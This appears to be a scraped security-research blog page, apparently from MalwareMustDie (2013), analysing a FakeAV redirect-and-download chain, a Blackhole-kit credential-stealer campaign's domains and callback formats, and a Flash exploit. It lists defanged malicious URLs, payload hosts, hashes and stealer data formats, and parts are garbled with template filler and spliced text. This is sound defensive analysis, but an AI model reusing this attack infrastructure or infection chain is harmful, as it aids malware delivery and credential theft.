Web users are once again warned to disable Java immediately to prevent any infection on production machines or networks.
Read this
Amid a serious security flaw in the latest version of Java 7, where even the U.S. Department of
Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.
Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.
Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.
Suddenly an Anti-Virus scan begins to run. After a few moments Dr. Banner is informed that his machine has numerous infections.
"Windows Security Alert? Trojan Downloaders and Encoders?"
"What the...?? I'm not even using a Windows machine!"
Suddenly Dr. Banner realizes what has occurred... his heart rate begins to race.
The transformation begins...The Nature of Infection
Where David Banner once stood is now a raging green beast.
The enraged Hulk roars, "RRRAAARRGHH!!!! Why can't puny malware -
leave Hulk alone??"
Taking a closer look, Hulk notices the evil culprit;
injected Javascript from h00p://anie50sdark.rr.nu/nl.php?p=d
The general chain of events showing the level of complexity of this malware..
Additional details can be found here -->>[pastebin link here]
Please note, these domains are dynamic & always changing,
so each interaction may be different as per below scheme:
1. anie50sdark[.]rr.nu/nl.php?p=d // IP is
2. Redirect via "window.top.location.replace" -->> simul12ations[.]rr.nu/n.php?h=1&s=nl // IP is
// from this point the lflink.com redirecting scheme (a Dynamic DNS URL) is utilized to download payload
3. Redirect via meta refresh method -->> www3[.]rle4wibx3.lflink.com/?z5wel=nqrgyamnopVqndXVtWCsW%2BvZ2K%2BglmismpnaZ9tlr4k%3D
// utilizing lflink.com's HTTP redirection 302
4. 302 redirect to main landing page-> www1[.]ezfqriux3154y-4.lflink.com/wk8d3gaz2s?98lssl=Xavk3N2p093K5tjR7p6omplxrmNkb17c3NepmKDH09TbssqHfFug7GplaWijmeLfovHcycKP1%2BGXbpeTwnJqX6zi57DZzOra5ZjM2LWIhFud6WpqcWafoaSemaiXqaaP6OyUpaqntl5asKHQsKmei%2B7a3a%2BdpqxoYmyWrY5kcV7g5rCdmK%2BfqquiqqtmV5mj5o6dp3Xj6uqfk%2BzS1qbg3tqrZGOg35mdp6Oa1uLZi9zY6q%2Fd1ueikp9Y
// another HTTP redirection 302
5. Click to download scandsk.exe -->> www1[.]ezfqriux3154y-4.lflink.com/XxDM1007_5606.php?98lssl=Xavk3N2p093K5tjR7p6omplxrmNkb17c3NepmKDH09TbssqHfFug7GplaWijmeLfovHcycKP1%2BGXbpeTwnJqX6zi57DZzOra5ZjM2LWIhFud6WpqcWafoaSemaiXqaaP6OyUpaqntl5asKHQsKmei%2B7a3a%2BdpqxoYmyWrY5kcV7g5rCdmK%2BfqquiqqtmV5mj5o6dp3Xj6uqfk%2BzS1qbg3tqrZGOg35mdp6Oa1uLZi9zY6q%2Fd1ueikp9Y
// the last chain is the payload download host: www2.f2ep4pjzr9a7e2.gw.lt
6. 302 redirect to scandsk.exe download -->> www2[.]f2ep4pjzr9a7e2.gw.lt/ddiaby1007_5606.php?ue6wsukx9=mdiu4N2y2dud25jN6Vrl096vbpdnm1jlzpq0ppvM2pvYb7fEf5bW7a9qkWecWOTYc%2B7pzbuem8%2BWotKTua%2BwmK3Xq6Kf3NWq65nYzrWOuVjO4HGmoqilZ5JpmWCmnWqd5unM7K7Zb5aWq9nOt6hrh6vZnrKZZ6uopqLabcdinZao46erpW6acJ5rqphpndfk2Nmi1G%2Fc56ujmOzenpWuzpTtmGTj2eHU5qSUldTdWtLc86%2BtwqbUk9%2BLqezVuNjcdtmX09R62dbflg%3D%3D
// with the strict setting..
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 04 Feb 2013 17:39:16 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.3.8
"Set-Cookie: ac5abc2a99=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: public, must-revalidate"
Content-Length: 953344
Content-Disposition: attachment; filename=scandsk.exe
Content-Transfer-Encoding: binary
After completion the user is presented with a convincing dialog box with the option to "remove all" detected malware.
When Hulk clicks anywhere on the message he is prompted to download FakeAV the "scandsk.exe".
As if possessed, the Hulk screams, "RRAAAARRRGGHHHH!!!
"CRUCESIGNATORUM!!! - Hulk summons his friends, the Malware Crusaders to assist with dissecting this evil software.
Meanwhile all of the operations stated above can be download as PCAP here -->>[MediaFire]
Malware Analysis
Erm.. Hi. this is @malwaremustdie.. I just (somehow) got summoned by Hulk,
if I understand his words (behind his anger roars) correctly, he wanted
us to.. err.. #SMASH!?? (peeking at Hulk..sweating) Obviously No!
To analyze the malware he found. :-)
As no one can say no to Hulk in this mode, and to avoid his neighbors calling
the police so we must get done to it fast, and here we go:
The malware looks like the below icon (Hulk had some collection)
And I am looking at the recent one with the below hash..Sample : "scandsk.exe"Is a PE with Sections:
Size: -rwxr--r-- 1 hulk green "953,344" scandsk.exe
MD5 : "bb21db6128c344ded94cda582f6d549f"
SHA256 : "8ca233cbefc68c39e1210ad9b7ed8d558a3a4939546badbcc4eed53a81f62670".text 0x1000 0x20d30 135168More info:
DATA 0x22000 0x4dca6 155648
DATA 0x70000 0x449be 169984
INIT 0xb5000 0x5d50a 186368
INIT 0x113000 0x40aac 265216
.rsrc 0x154000 0x955c 38912
.reloc 0x15e000 0x16c 1024Entry Point at 0xe66fA quick scan in VT -->>[HERE] will show these Malware Names:
Virtual Address is 0x40f26f
Fake compile time: 2008-08-06 15:52:29
Wrong CRC, Claimed: 992898 Actual: 977558
Invalid import segment, and most of the sections are crypted.MicroWorld-eScan : Gen:Variant.Kazy.132675In the binary, after de-packed, it was seen below malicious actions: Self-renamed:
nProtect : Backdoor/W32.Simda.953344
Malwarebytes : Trojan.Agent.AFF
TheHacker : Trojan/Simda.b
ESET-NOD32 : Win32/Simda.B
Avast : Win32:MalOb-IJ [Cryp]
Kaspersky : Backdoor.Win32.Simda.pvc
BitDefender : Gen:Variant.Kazy.132675
Agnitum : Backdoor.Simda!ZWUl9AhwKrI
Comodo : Backdoor.Win32.Simda.PVC
F-Secure : Gen:Variant.Kazy.132675
DrWeb : Trojan.Rodricter.21
VIPRE : Backdoor.Win32.Simda.b (v)
AntiVir : TR/Dropper.Gen
Sophos : Mal/Simda-G
Jiangmin : Backdoor/Simda.bfh
Kingsoft : Win32.Hack.Simda.p.(kcloud)
GData : Gen:Variant.Kazy.132675
AhnLab-V3 : Backdoor/Win32.Simda
Ikarus : Win32.SuspectCrc
Fortinet : W32/Simda.B!tr
AVG : Dropper.Generic7.BEOR
Panda : Suspicious file%Temp%\1.tmpAnd copied itself to the%appdata%\ScanDisc.exeDrop components s.exe, d.sys, s.sys :c%systemroot%\system32Using CMD to register itself as highest task & execution component binary:
%AppData%\dexplorer.execmd.exeIt then detected these softwares:
<Principal id="LocalSystem">
<Actions Context="LocalSystem">
dexplorer.execv.exeIf one of these are found somehow malware will not infect properly. If it infects, it will run these operations: Changes your registry PC's DNS server setting into +
Aircrack-ng Gui.exe
Software\eEye Digital Security
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\wireshark.exe
SOFTWARE\B Labs\Bopup Observer
AppEvents\Schemes\Apps\Bopup Observer
Software\B Labs\Bopup Observer
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Win Sniffer_is1
Software\Win Sniffer
Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\Debugging Tools for Windows (x86)
Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\APIS32
Software\Syser Soft
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Oracle VM VirtualBox Guest Additions
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ERUNT_is1HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{101AD58A-72E3-4831-9F1E-01C7C72E2FAB}Changing the policy regarding to temporary data:
→","SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemSelfrunning itself using Runonce:
Temp\LowSOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceCleaning your hosts data by rewriting clean hosts file:
C:\Documents and Settings\$USER\
\scandsk.exe"C:\Windows\system32\drivers\etc\hosts.txt"Changing your search engine setting into ... h00p://findgala.com (?)
# Copyright (c) 1993-2006 Microsoft Corp.
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
# For example:
# rhino.acme.com # source server
# x.acme.com # x client host
" localhost
::1 localhost"
# Copyright (c) 1993-2006 Microsoft Corp.
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
# For example:
# rhino.acme.com # source server
# x.acme.com # x client host
" localhost
::1 localhost"\Software\Microsoft\Internet Explorer\SearchScopesWe detect the attempt for spam setting spf record:
<SearchPlugin xmlns="http://www.mozilla.org/2006/browser/search/">
<Description>Search for the best price.</Description>
<Url type="text/html" method="GET" template="%s">
<Image width="16" height="16">%2B%2Ff33%2BdvvX7%2F%2FMjEx8nKycrGzwKXOiPKzICvdeezLhCV3jp15%2Bfv%2FX0YGhv8MDDxMX2qKTIw0RK10eYD6QYqATvoPBkt3f5K0W9Ew4fjTFz%2F%2Bw8Dm3W8UPeZxqFa%2BevsFyD0twgfVsOfkRxHrtfV9u5BVQ8Crd98%2FffkGYQM1QJ20%2FfSPv79eNxQGYfpSVJADmcvEAHbr7oOX2dj%2FERNKIA2%2F%2F%2Fz%2FxfCDhYVoDUDw5P6vf9%2B5iY0HVmZGQWm%2BN3fff%2Fn2k4eLHS739x%2FDiRs%2Ff%2F%2F5x8HO%2FOHzN3djfqgNjIwMgc6qzLx%2Fpy47j2zY%2Feff06tXhOUucgxeun33AUZGpHh4%2Bvo7t8EyIJqz%2FhpasD59%2B5dNrqdnznZIsEL9ICXCsWuBCwvTv%2FymS5PWPP32ExEALz%2F%2BB5r848cPCJcRaMP9xaYQzofPPzfuvrnj0Jst%2B5%2F8%2Bc4sLPeDkYlRgJc93VPE18NIXkYUmJYQSQMZ%2FP3379uPH7%2F%2F%2FEETBzqJ0WqLGvFpe2LCC4AAAwAyjg7ENzDDWAAAAABJRU5ErkJggg%3D%3D</Image>
<Param name="q" value="{searchTerms}"/>
<Param name="uid" value="%d"/>
</SearchPlugin>v=spf1 a mx ip4:%d.%d.%d.%d/%d ?all↑which ip4:%d.%d.%d.%d/%d is the malicious IP. Detecting attempt to networking to remote hosts: Communicating with remote hosts with the method:HTTP/1.1, GET, HEAD or POSTWith the HTTP operations of:
User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre
User-agent: IE7
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencodedHTTP/1.1 GET /?abbr=RTK&setupType=update&uid=%d&ttl=%s&controller=microinstaller&pid=3If we execute this scandsk.exe, it goes like this:
Host: "update1.randomstring.com"
HTTP/1.1 HEAD /update_c1eec.exe
Host: "update1.randomstring.com"
Host: "update1.randomstring.com"
User-Agent: IE7
Service 1.0
runtime 11.0
Service 2.0
runtime 12.0
Service 3.0
runtime 13.0
layout/4.0Soon after just sitting there, the CPU resource will boil up and we'll find that network request started to be sent like:
That's my analysis, a FakeAV, sending your data + other malware's downloader. It doesn't do the ransom, will annoy you and make you pay. I'll pass you back to Hulk :-)
#MalwareMustDie, the NPO.Malware Network ID Analysis
The FakeAV download url: update1.randomstring[.]com/update_c1eec.exeRegistered through: GoDaddy.com, LLC (http://www.godaddy.com)The FakeAV callback IP
Created on: 30-May-03
Expires on: 30-May-13
Last Updated on: 01-Mar-11
"Happy Dude <==LAME
1 Happy St <==LAME
QLD, None Selected 4000 <==LAME"
Australiainetnum: - download server: www2.f2ep4pjzr9a7e2.gw.lt
"netname: marysanders1
descr: marysanders1net
country: IE (Ireland, Dublin)"
admin-c: OTC9-RIPE
tech-c: OTC9-RIPE
descr: OVH ISP
descr: Paris, France
origin: AS16276
mnt-by: OVH-MNT
source: RIPE # Filteredgw.lt internet address = FakeAV used redirector service: Dynamic DNS provided by ChangeIP.com
primary name server = ns1.afraid.org
responsible mail addr = dnsadmin.afraid.org
serial = 1302230009
refresh = 86400 (1 day)
retry = 7200 (2 hours)
expire = 2419200 (28 days)
default TTL = 3600 (1 hour)
gw.lt MX preference = 20, mail exchanger = alt1.aspmx.l.google.com
gw.lt MX preference = 20, mail exchanger = alt2.aspmx.l.google.com
"can't trace the whois db..."
$ whois gw.it
Domain: gw.it
"Status: UNASSIGNABLE <== marked"
"but practically is up & alive.."
serial 2013022313 +-a.dns.it (
serial 2013022313 | +-c.dns.it (
serial 2013022313 | | +-dns.nic.it (
serial 2013022313 | | | +-m.dns.it (
serial 2013022313 | | | | +-nameserver.cnr.it (
serial 2013022313 | | | | | +-r.dns.it (
serial 2013022313 | | | | | | +-s.dns.it ( Name: LFLINK.COMFakeAV TDS domain RR.NU(redirected by Sitelutions Redirection Engine):
"Network Operations, ChangeIP"
1200 Brickell Avenue
Suite 1950
Miami, FL 33131, US
"Domain servers in listed order:
NS2.CHANGEIP.ORG Domain Ltd Whois service
Domain Name (ASCII): rr.nu
Technical Contact:"
InfoRelay abuse@sitelutions.com
4 Bridge Plaza Drive
NJ 07726 US
Phone: (703) 485-4600 (voice)"
Record last updated on 2011-Oct-17.
Record expires on 2016-Nov-4.
Record created on 1998-Nov-4.
Record status: Active
Registrar of record: .NU Domain Ltd
Referral URL: http://www.nunames.nu
Domain servers in listed order:
"Owner and Administrative Contact information for domains
registered in .nu is available upon request from support@nic.nu"
Copyright by .NU Domain Ltd - http://www.nunames.nu
The spam driven credentials/PWS stealer group we track, that is known for infecting trojan to steal credential via Blackhole Exploit Exploit Kit, that is responsible to the infection of recent fake FedEx, fake Amazon ticket, fake BBB, fake American Express spams and so on, is recently making a brand new new campaign through the below "real" malware infector domains:
fuigadosi.ru (NEW)Currently (see the NEW tagged domains) are active for infecting:
faneroomk.ru (NEW)
fzukungda.ru (NEW)
famagatra.ru (NEW)
fulinaohps.ru (NEW)
finalions.ru (NEW)
emmmhhh.ru (NEW)
errriiiijjjj.ru (NEW)
ejjiipprr.ru (NEW)
eiiiioovvv.ru (NEW)
"previous infector used historically:"
Tracing to fzukungda.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (
|\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried
|\___ e.dns.ripn.net [ru] (
| |\___ ns2.fzukungda.ru [fzukungda.ru] ( Got authoritative answer
| |\___ ns4.fzukungda.ru [fzukungda.ru] ( Got authoritative answer
| |\___ ns3.fzukungda.ru [fzukungda.ru] ( Got authoritative answer
| |\___ ns5.fzukungda.ru [fzukungda.ru] ( *
| \___ ns1.fzukungda.ru [fzukungda.ru] ( Got authoritative answer
|\___ a.dns.ripn.net [ru] (2001:0678:0017:0000:0193:0232:0128:0006) Not queried
|\___ a.dns.ripn.net [ru] (
| |\___ ns1.fzukungda.ru [fzukungda.ru] ( (cached)
| |\___ ns3.fzukungda.ru [fzukungda.ru] ( (cached)
| |\___ ns4.fzukungda.ru [fzukungda.ru] ( (cached)
| |\___ ns2.fzukungda.ru [fzukungda.ru] ( (cached)
| \___ ns5.fzukungda.ru [fzukungda.ru] ( *
: :
Tracing to famagatra.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (
|\___ b.dns.ripn.net [ru] (2001:0678:0016:0000:0194:0085:0252:0062) Not queried
|\___ b.dns.ripn.net [ru] (
| |\___ ns4.famagatra.ru [famagatra.ru] ( Got authoritative answer
| |\___ ns1.famagatra.ru [famagatra.ru] ( Got authoritative answer
| |\___ ns5.famagatra.ru [famagatra.ru] ( *
| |\___ ns2.famagatra.ru [famagatra.ru] ( Got authoritative answer
| \___ ns3.famagatra.ru [famagatra.ru] ( Got authoritative answer
|\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
|\___ f.dns.ripn.net [ru] (
| |\___ ns2.famagatra.ru [famagatra.ru] ( (cached)
| |\___ ns5.famagatra.ru [famagatra.ru] ( *
| |\___ ns1.famagatra.ru [famagatra.ru] ( (cached)
| |\___ ns4.famagatra.ru [famagatra.ru] ( (cached)
| \___ ns3.famagatra.ru [famagatra.ru] ( (cached)
: :
Tracing to fulinaohps.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (
|\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
|\___ f.dns.ripn.net [ru] (
| |\___ ns3.fulinaohps.ru [fulinaohps.ru] ( Got authoritative answer
| |\___ ns5.fulinaohps.ru [fulinaohps.ru] ( *
| |\___ ns2.fulinaohps.ru [fulinaohps.ru] ( Got authoritative answer
| |\___ ns1.fulinaohps.ru [fulinaohps.ru] ( Got authoritative answer
| \___ ns4.fulinaohps.ru [fulinaohps.ru] ( Got authoritative answer
|\___ b.dns.ripn.net [ru] (2001:0678:0016:0000:0194:0085:0252:0062) Not queried
|\___ b.dns.ripn.net [ru] (
| |\___ ns3.fulinaohps.ru [fulinaohps.ru] ( (cached)
| |\___ ns5.fulinaohps.ru [fulinaohps.ru] ( *
| |\___ ns2.fulinaohps.ru [fulinaohps.ru] ( (cached)
| |\___ ns1.fulinaohps.ru [fulinaohps.ru] ( (cached)
| \___ ns4.fulinaohps.ru [fulinaohps.ru] ( (cached)
: :
Tracing to emmmhhh.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (
|\___ a.dns.ripn.net [ru] (2001:0678:0017:0000:0193:0232:0128:0006) Not queried
|\___ a.dns.ripn.net [ru] (
| |\___ ns5.emmmhhh.ru [emmmhhh.ru] ( *
| |\___ ns2.emmmhhh.ru [emmmhhh.ru] ( Got authoritative answer
| |\___ ns1.emmmhhh.ru [emmmhhh.ru] ( Got authoritative answer
| |\___ ns4.emmmhhh.ru [emmmhhh.ru] ( Got authoritative answer
| \___ ns3.emmmhhh.ru [emmmhhh.ru] ( Got authoritative answer
|\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
|\___ f.dns.ripn.net [ru] (
| |\___ ns4.emmmhhh.ru [emmmhhh.ru] ( (cached)
| |\___ ns2.emmmhhh.ru [emmmhhh.ru] ( (cached)
| |\___ ns5.emmmhhh.ru [emmmhhh.ru] ( *
| |\___ ns1.emmmhhh.ru [emmmhhh.ru] ( (cached)
| \___ ns3.emmmhhh.ru [emmmhhh.ru] ( (cached)
: :
Tracing to errriiiijjjj.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (
|\___ b.dns.ripn.net [ru] (2001:0678:0016:0000:0194:0085:0252:0062) Not queried
|\___ b.dns.ripn.net [ru] (
| |\___ ns4.errriiiijjjj.ru [errriiiijjjj.ru] ( Got authoritative answer
| |\___ ns2.errriiiijjjj.ru [errriiiijjjj.ru] ( Got authoritative answer
| |\___ ns3.errriiiijjjj.ru [errriiiijjjj.ru] ( Got authoritative answer
| |\___ ns5.errriiiijjjj.ru [errriiiijjjj.ru] ( *
| \___ ns1.errriiiijjjj.ru [errriiiijjjj.ru] ( Got authoritative answer
|\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried
|\___ e.dns.ripn.net [ru] (
| |\___ ns2.errriiiijjjj.ru [errriiiijjjj.ru] ( (cached)
| |\___ ns4.errriiiijjjj.ru [errriiiijjjj.ru] ( (cached)
| |\___ ns5.errriiiijjjj.ru [errriiiijjjj.ru] ( *
| |\___ ns1.errriiiijjjj.ru [errriiiijjjj.ru] ( (cached)
| \___ ns3.errriiiijjjj.ru [errriiiijjjj.ru] ( (cached)
: :
Tracing to ejjiipprr.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (
|\___ d.dns.ripn.net [ru] (2001:0678:0018:0000:0194:0190:0124:0017) Not queried
|\___ d.dns.ripn.net [ru] (
| |\___ ns3.ejjiipprr.ru [ejjiipprr.ru] ( Got authoritative answer
| |\___ ns1.ejjiipprr.ru [ejjiipprr.ru] ( Got authoritative answer
| |\___ ns2.ejjiipprr.ru [ejjiipprr.ru] ( Got authoritative answer
| \___ ns4.ejjiipprr.ru [ejjiipprr.ru] ( Got authoritative answer
|\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
|\___ f.dns.ripn.net [ru] (
| |\___ ns3.ejjiipprr.ru [ejjiipprr.ru] ( (cached)
| |\___ ns4.ejjiipprr.ru [ejjiipprr.ru] ( (cached)
| |\___ ns1.ejjiipprr.ru [ejjiipprr.ru] ( (cached)
| \___ ns2.ejjiipprr.ru [ejjiipprr.ru] ( (cached)
: :
Tracing to eiiiioovvv.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (
|\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried
|\___ e.dns.ripn.net [ru] (
| |\___ ns2.eiiiioovvv.ru [eiiiioovvv.ru] ( Got authoritative answer
| |\___ ns3.eiiiioovvv.ru [eiiiioovvv.ru] ( Got authoritative answer
| |\___ ns4.eiiiioovvv.ru [eiiiioovvv.ru] ( Got authoritative answer
| \___ ns1.eiiiioovvv.ru [eiiiioovvv.ru] ( Got authoritative answer
|\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
|\___ f.dns.ripn.net [ru] (
| |\___ ns4.eiiiioovvv.ru [eiiiioovvv.ru] ( (cached)
| |\___ ns1.eiiiioovvv.ru [eiiiioovvv.ru] ( (cached)
| |\___ ns2.eiiiioovvv.ru [eiiiioovvv.ru] ( (cached)
| \___ ns3.eiiiioovvv.ru [eiiiioovvv.ru] ( (cached)
: :
Tracing to finalions.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (
|\___ d.dns.ripn.net [ru] (2001:0678:0018:0000:0194:0190:0124:0017) Not queried
|\___ d.dns.ripn.net [ru] (
| |\___ ns4.finalions.ru [finalions.ru] ( Got authoritative answer
| |\___ ns2.finalions.ru [finalions.ru] ( Got authoritative answer
| |\___ ns1.finalions.ru [finalions.ru] ( Got authoritative answer
| |\___ ns3.finalions.ru [finalions.ru] ( Got authoritative answer
| \___ ns5.finalions.ru [finalions.ru] ( *
|\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried
|\___ e.dns.ripn.net [ru] (
| |\___ ns2.finalions.ru [finalions.ru] ( (cached)
| |\___ ns1.finalions.ru [finalions.ru] ( (cached)
| |\___ ns3.finalions.ru [finalions.ru] ( (cached)
| |\___ ns5.finalions.ru [finalions.ru] ( *
| \___ ns4.finalions.ru [finalions.ru] ( (cached)
: :
UPDATE: 2013, March 01
Latest domains used by this Bad Actor:
This group is continuing their criminal operation under NAUNET(Russia) rogue registrar,
registering & activated malicious domains with rogue registration (see marked words below)
registrar: NAUNET-REG-RIPNThey are keep on updating domains for their crime operation in daily basis,
person: "Private Person"
#MalwareMustDie, the NPO, Feb 2013.Details
New infection methods implemented:1. Using the (suspected Geo-base)IP rotator base response to infection
2. Starting the infection of the Ransomware for the certain GeoIP.
3. The usage of fake/stolen CA certification is spotted. (thank's to @it4sec)
We monitored this activities for last 4days and exposed 2 reports of this case in
the our beloved Pastebin with the links below:
With the PluginDetect exposed as per below:1. http://pastebin.com/CpRXS5m3
2. http://pastebin.com/MkYVRz4R
3. http://pastebin.com/mCJy7GEn
4. http://pastebin.com/LSUCnvN6
And the "latest" Payloads as per below:
Cridex:1. 6cd8ae852bd023982b292a714d3e1582537606cc655a74c1fef152742c215e00
2. 5050a5bdf164767ba6a8432a273942983737b3553c2f0d8fdbab42bbdaab3f6e
3. a54c2b298c3fc8162458889f290d2e6713a6ba45c8c697e17a333409c037bff4
4. 6ba7598df3a3111c4304f2c565ecc8307ecef504e0413c230e87ff6d845076da
Ransomer:1. 3cb0a852b902c1beffa70e6405825dfe71ad28141f8bcc369880af9f7e692b84
2. bea956049c02eefa07495dda55a1624ba3fe4020ed268094f7b63ec53439d48d
You'll see the LATEST popped up snapshot of download binary here:
This criminal group is aiming the:1. Internet service login credentials (ftp/pop3/imap/http)
2. Online cash/transaction information
3. Phishing & fraudulence of online bankingProof of Concept
First PoC is as per pasted stealer config file here -->>[HERE]
For the security purpose we can not report the Ransomer parts yet,
but Credential Stealer Trojan used(Cridex+Fareit) are using callbacks with
the below details:
The below communication HTTP headers..(info for filtration purpose)Callback IPs..
Method : HTTP/1.1 POST
user-agent : Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
contents-type: application/x-www-form-urlencodedh00p:// // the url will be plus /XXX(random)/XXX(random)/XXX(random)Credential stealed with below POSTED formats: (note: grabbed ftp/http/pop3/internet explorer/firefox/macromedia used)
h00p://<http time="%%%uu">Supporting the stealing method/commands:
<httpshot time="%%%uu">
<ftp time="%%%uu">
<pop3 time="%%%uu">
<cmd id="%u">%u</cmd>
<cert time="%u">
<ie time="%u"><data><![CDATA[]]></data></ie> // Internet Explorer....
<ff time="%u"><data><![CDATA[]]></data></ff> // firefox...
<mm time="%u"><data><![CDATA[]]></data></mm> // Macromedia....
<message set_hash="%%.%us" req_set="%%%%u" req_upd="%%%%u">
</message>hashAlso supporting the file-sending method:
httpinjectsHTTP/1.1 200 OKWith sending information to the remote malicious servers/panels below:
Connection: close
Content-Type: text/html
Content-Disposition: attachment; filename=%Sh00p://! The GeoIP scheme used to rotate request is matched with the below :
h00p:// Materials
Samples Collected -->>[HERE]We recorded PCAP up to 1700+ sec of a last infection-->>[HERE]Just block this now: < new IP for: emmmhhh.ru | errriiiijjjj.ru | ejjiipprr.ru | eiiiioovvv.ru
— Malware Crusaders (@MalwareMustDie) February 20, 2013Additional: Thu Feb 21 18:33:41 JST 2013 The PWS Stealer (Cridex drops Fareit) distributed via BHEK, VT: 6ba7598df3a3111c4304f2c565ecc8307ecef504e0413c230e87ff6d845076daLanding page: h00p://faneroomk.ru:8080/forum/links/column.php IP:,, Landing page + PDF infector PoC http://urlquery.net/report.php?id=1057467Payload Url: h00p://faneroomk.ru:8080/forum/links/column.php?gf=30:1n:1i:1i:33&re=2v:1k:1m:32:33:1k:1k:31:1j Payload PoC: http://urlquery.net/report.php?id=1057662*) thanks to @PhysicalDrive0 for landing page urlquery info.The below crusaders is supporting this investigation: @Hulk_Crusader. @it4sec, @RazorEQX, @unixfreaxjp, @PhysicalDrive0
The malicious SWF checks/detects whether your system is x32 or x64, it provides both malwares and exploit scheme including the exploit data streams for both platforms (suspected two types of x32 & x64 a shellcodes also exist & still under investigation).
In my case upon the post exploitation it drops stream-out "extract" a DLL malware file from the embedded binary object. The shellcode itself will drop a malware library into %Temp% path and execute it to drop the malware executable binary.
The extraction embedded attachment process is well explain in the Adobe API reference -->>[HERE]
Which I quoted as per below:
The byte data that you are embedding can be in any kind of file, and the entire file is always embedded. You cannot embed the bytes of a particular asset that is in a SWF file, although you can embed an entire SWF file.
The MXML compiler autogenerates a class that extends ByteArrayAsset to represent the embedded data. :
The compiler autogenerates a subclass of the ByteArrayAsset class and sets your variable to be a reference to this autogenerated class. You can then use this class reference to create instances of the ByteArrayAsset using the new operator, and you can extract information from the byte array using methods of the ByteArray class:
var storyByteArray:ByteArrayAsset = ByteArrayAsset(new storyClass());
To be NOTED: the binaries are not encoded in JS/code parts, JS/code was used for exploitation act.
The post exploit itself runs the function x32 or x64 to extract the object. Which are windows x32 and x64 DLL files. It is aiming ONLY for windows platform, with aiming exploitation for flash versions:
The exploit was said aiming the ActiveX, yes, thus in the sample I analized I saw codes showing the checks on it, BUT, in codes also I saw exploitation scheme for the Flash player without ActiveX support.11,5,502,146 11,4,402,287
11,5,502,135 11,4,402,278
11,5,502,110 11,4,402,265
The method of flash.utils::ByteArray, following by flash.utils::Endian and the callpropvoid of writeInt to push the malicious Endian codes is the execution part of this exploitation. While before it we can find the usage of stack overflow by malicious codes like 0x41414141 and 0xFFFFFFF8 in the Flash Vector object formed, and the method of using textfield(with having the font parameter in it) to be filled with the vector object formed.
Strings used for exploitation is cleverly scattered between _local* variables, made us difficult to trace it by eyes, so by the help of debugger we can understand the flow.
I'm currently in the middle of separating exploit strings while writing this at the same time & trying to find the solid PoC of shellcode which still in process. Since the reference of exploit in this CVE is still not clear here and there (like some reference mentioning buffer overflow while other mentioning memory corruption) and also considering that new information is still keep on popping up, thus the lack of analysis sample of CVE-2013-0634 SWF file itself (so far I found only ONE "suspected" sample of CVE-2013-0634 posted in VT), made me think to have a break for a while and taking liberty to split the post into parts (1 and 2) make updates in the related topic.
